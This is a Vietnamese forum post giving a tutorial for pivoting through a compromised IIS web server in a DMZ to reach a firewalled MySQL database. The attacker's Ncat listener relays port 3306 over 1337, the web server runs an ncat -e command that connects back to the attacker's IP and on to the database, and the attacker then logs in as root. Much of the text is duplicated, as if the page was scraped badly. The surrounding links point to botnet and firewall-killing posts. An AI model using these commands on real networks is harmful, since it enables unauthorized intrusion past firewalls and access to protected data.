Vượt tường lửa bằng Ncat
Trang 1 trong tổng số 1 trang
Vượt tường lửa bằng Ncat
Trong hình trên, chúng ta có thể thấy web server đang nằm trong vùng DMZ còn database server thì được firewall bảo vệ, giả định web server đang chạy IIS mắc lỗi và ta có thể cài Ncat tại web server. Mục đích của cuộc tấn công là kết nối từ vị trí của Attack đến Database server.
Để kết nối tới Database server thì web server được xem là một điểm mấu chốt. Tất cả traffc mạng giữa database server và attacker sẽ được định tuyến thông qua điểm này. Để thực hiện tấn công, ta dùngNcat- phiên bản nâng cấp từ Netcat . Đã có nhiều tài liệu giúp khai thác Ncat một cách dễ dàng, nhưng trong bài viết này chúng tôi chỉ đưa ra các lệnh cơ bản phục vụ cho thực tế hiện có.
Trên hệ thống Attacker :
Bời vì Firewall chỉ cho phép các kết nối vào webserver thông qua cổng dịch vụ web (Web service) và không giới hạn các kết nối ngược từ webserver ra ngoài, nên chúng ta có thể lạm dụng web server thông qua Web service và lật ngược kết nối về máy attacker mà không bị Firewall ngăn chặn. Chúng ta sẽ thiết lập một Listener Ncat, tuy nhiên, chúng ta sẽ tạo ra một listener-to-listener, từ đó ta có thể thiết lập kết nôi từ port 3306 nhưng thực chất khi đến Firewall vẫn là 1337 ( trên 1 số webserver, port 1337 được dùng cho các ứng dụng web phụ trội)
- Code:
ncat -l 1337 -c "ncat -l 3306"
-l 1337: nghe TCP trên cổng 1337
-c "ncat -l 3306": chuyển tất cả dữ liệu được nhận và gửi của 3306 về cồng 1337
Trên web server
Dùng Ncat tạo một client-to-client thiết lập kết nối giữa listener ta vừa tạo ở bước trước hướng tới Database server. Kết nối này sẽ mang tất cả dữ liệu giữa Attacker và database server
- Code:
ncat 10.1.1.1 1337 -e "ncat 10.3.1.1 3306"
-e "ncat 10.3.1.1 3306" : thực thi câu lệnh "ncat 10.3.1.1 3306" (lưu ý trên máy attacker dùng -c do hệ thống của attacker là linux)
- phiên bản nâng cấp từ Netcat . Đã có nhiều tài liệu giúp khai thác Ncat một cách dễ dàng, nhưng trong bài viết này chúng tôi chỉ đưa ra các lệnh cơ bản phục vụ cho thực tế hiện có.
Trên hệ thống Attacker :
Bời vì Firewall chỉ cho phép các kết nối vào webserver thông qua cổng dịch vụ web (Web service) và không giới hạn các kết nối ngược từ webserver ra ngoài, nên chúng ta có thể lạm dụng web server thông qua Web service và lật ngược kết nối về máy attacker mà không bị Firewall ngăn chặn. Chúng ta sẽ thiết lập một Listener Ncat, tuy nhiên, chúng ta sẽ tạo ra một listener-to-listener, từ đó ta có thể thiết lập kết nôi từ port 3306 nhưng thực chất khi đến Firewall vẫn là 1337 ( trên 1 số webserver, port 1337 được dùng cho các ứng dụng web phụ trội)
ncat -l 1337 -c "ncat -l 3306"
-l 1337: nghe TCP trên cổng 1337
-c "ncat -l 3306": chuyển tất cả dữ liệu được nhận và gửi của 3306 về cồng 1337
Trên web server
Dùng Ncat tạo một client-to-client thiết lập kết nối giữa listener ta vừa tạo ở bước trước hướng tới Database server. Kết nối này sẽ mang tất cả dữ liệu giữa Attacker và database server
ncat 10.1.1.1 1337 -e "ncat 10.3.1.1 3306"
-e "ncat 10.3.1.1 3306" : thực thi câu lệnh "ncat 10.3.1.1 3306" (lưu ý trên máy attacker dùng -c do hệ thống của attacker là linux)
Trên hệ thông Attacker
Bây giờ đường kết nối đã được thiết lập tất cả những việc còn lại chỉ là kết nối thông qua listener 3306 trên Attacker.
Trên hệ thông Attacker
Bây giờ đường kết nối đã được thiết lập tất cả những việc còn lại chỉ là kết nối thông qua listener 3306 trên Attacker.
- Code:
mysql -h 127.0.0.1 -u root -p
Similar topics
» Hướng Dẫn Kill tường lửa của windows bằng C++
» Viết botnet bằng AutoIT
» Xác định IP của thư đến bằng Gmail
» Bảo mật hệ thống firewall từ xa bằng SSH
» Taskkill.exe tắt process bằng API nào
» Viết botnet bằng AutoIT
» Xác định IP của thư đến bằng Gmail
» Bảo mật hệ thống firewall từ xa bằng SSH
» Taskkill.exe tắt process bằng API nào
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
27/8/2013, 11:45 am by echcondihoc
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
11/10/2011, 9:42 pm by CNTT_DH
» xin tai lieu tieng viet
31/8/2011, 6:59 am by bantoisg
» Theo dõi tiến trình
27/8/2011, 5:51 pm by haigaopro01
» Giải pháp Bảo mật của Cisco
17/6/2011, 8:50 am by admin
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
16/6/2011, 2:32 pm by admin
» Learn to hack !
16/6/2011, 8:49 am by admin
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
15/6/2011, 11:12 am by admin
» Ô Long Viên (Tập II)
27/9/2010, 4:56 pm by root
» những ebook về hack tiếng việt cho người mới tìm hiểu.
27/9/2010, 4:54 pm by root